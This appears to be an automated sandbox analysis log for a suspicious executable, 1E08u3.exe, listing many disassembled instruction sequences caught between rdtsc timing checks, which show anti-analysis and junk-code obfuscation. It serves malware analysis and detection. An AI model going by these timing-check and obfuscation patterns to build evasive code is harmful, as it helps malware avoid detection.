Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC5C5 second address: 6AC5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC5CB second address: 6AC5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC5D5 second address: 6AC5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC5D9 second address: 6AC5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC822 second address: 6AC852 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A4D6CB96h 0x00000008 jmp 00007FD3A4D6CB9Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FD3A4D6CBACh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC852 second address: 6AC85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC85A second address: 6AC85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ACB2A second address: 6ACB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE8Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6A4E7D second address: 6A4EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA0h 0x00000009 jmp 00007FD3A4D6CB9Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6A4EA3 second address: 6A4EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ACF9F second address: 6ACFAB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3A4D6CB96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ACFAB second address: 6ACFD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FD3A47FEE99h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ACFD3 second address: 6ACFE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ACFE0 second address: 6ACFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AD9C2 second address: 6AD9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD3A4D6CBA3h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B2134 second address: 6B213E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B213E second address: 6B2144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B2144 second address: 6B2156 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B2156 second address: 6B215B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B3718 second address: 6B371C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B371C second address: 6B3724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 677BA8 second address: 677BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 677BB0 second address: 677BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 677BB4 second address: 677BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6B760C second address: 6B7612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 680181 second address: 680187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BAEFF second address: 6BAF13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD3A4D6CB9Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BB03E second address: 6BB04C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD3A47FEE8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BB2F5 second address: 6BB2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BB2FB second address: 6BB2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BB5EA second address: 6BB5EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 672BC3 second address: 672BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD3A47FEE86h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BDC60 second address: 6BDC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BDC64 second address: 6BDC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD3A47FEE91h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BDC90 second address: 6BDC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BDC95 second address: 6BDC9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BE49B second address: 6BE4A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BE4A1 second address: 6BE4A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6BEE50 second address: 6BEE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0B1A second address: 6C0B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0210 second address: 6C0214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0B1F second address: 6C0B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0214 second address: 6C0234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0B25 second address: 6C0B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD3A47FEE86h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0234 second address: 6C0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C0238 second address: 6C0255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C1626 second address: 6C1677 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3A4D6CBA5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub esi, dword ptr [ebp+122D37E1h] 0x00000011 push 00000000h 0x00000013 cld 0x00000014 push 00000000h 0x00000016 sub esi, dword ptr [ebp+122D3323h] 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FD3A4D6CBA4h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edi 0x00000027 pop edi 0x00000028 jmp 00007FD3A4D6CB9Ah 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C1677 second address: 6C1681 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3A47FEE8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C13FD second address: 6C1408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD3A4D6CB96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C1408 second address: 6C140D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C3662 second address: 6C366F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C366F second address: 6C36C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE8Bh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c stc 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 jg 00007FD3A47FEE8Ch 0x00000016 sub dword ptr [ebp+122D1B97h], edi 0x0000001c popad 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FD3A47FEE88h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jne 00007FD3A47FEE86h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C5D58 second address: 6C5D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CDC96 second address: 6CDC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CDC9B second address: 6CDCA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD3A4D6CB96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CEBC0 second address: 6CEBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CEBDA second address: 6CEC01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FD3A4D6CBA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CEC01 second address: 6CEC05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6C3427 second address: 6C342D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D1C05 second address: 6D1C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD3A47FEE86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D1C0F second address: 6D1C8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e adc ebx, 63C97F11h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FD3A4D6CB98h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 cmc 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FD3A4D6CB98h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d sub ebx, dword ptr [ebp+122D3681h] 0x00000053 push eax 0x00000054 jo 00007FD3A4D6CBA4h 0x0000005a push eax 0x0000005b push edx 0x0000005c push edi 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D2C65 second address: 6D2C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D4BF1 second address: 6D4BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D4BF6 second address: 6D4BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CCD8A second address: 6CCD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CCD8E second address: 6CCDA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CEDAD second address: 6CEDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D89FE second address: 6D8A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD3A47FEE86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D8A09 second address: 6D8A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D8A0E second address: 6D8A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD3A47FEE88h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 cld 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+1245987Bh], esi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FD3A47FEE88h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov bx, dx 0x0000004e xchg eax, esi 0x0000004f jc 00007FD3A47FEE92h 0x00000055 jns 00007FD3A47FEE8Ch 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FD3A47FEE98h 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D8A93 second address: 6D8A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D8A99 second address: 6D8A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CEDB1 second address: 6CEE58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FD3A4D6CB98h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 add dword ptr [ebp+122D2B9Ah], edx 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jbe 00007FD3A4D6CB9Ch 0x00000039 mov edi, dword ptr [ebp+122D3685h] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FD3A4D6CB98h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov dword ptr [ebp+1248BF04h], edx 0x00000066 add dword ptr [ebp+122D18B7h], esi 0x0000006c mov eax, dword ptr [ebp+122D1391h] 0x00000072 pushad 0x00000073 xor dword ptr [ebp+122D34B4h], esi 0x00000079 popad 0x0000007a push FFFFFFFFh 0x0000007c mov edi, ecx 0x0000007e push eax 0x0000007f jl 00007FD3A4D6CBA0h 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CFD8B second address: 6CFD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FD3A47FEE88h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6DBF36 second address: 6DBF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CFD9A second address: 6CFE47 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3A47FEE8Ch 0x00000008 jg 00007FD3A47FEE86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov edi, ebx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a add bx, 6A87h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FD3A47FEE88h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov eax, dword ptr [ebp+122D0FC9h] 0x00000046 jmp 00007FD3A47FEE8Eh 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007FD3A47FEE88h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 jmp 00007FD3A47FEE99h 0x0000006c mov bx, B2A0h 0x00000070 jl 00007FD3A47FEE86h 0x00000076 push eax 0x00000077 pushad 0x00000078 push esi 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6CFE47 second address: 6CFE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6D1E0E second address: 6D1E18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
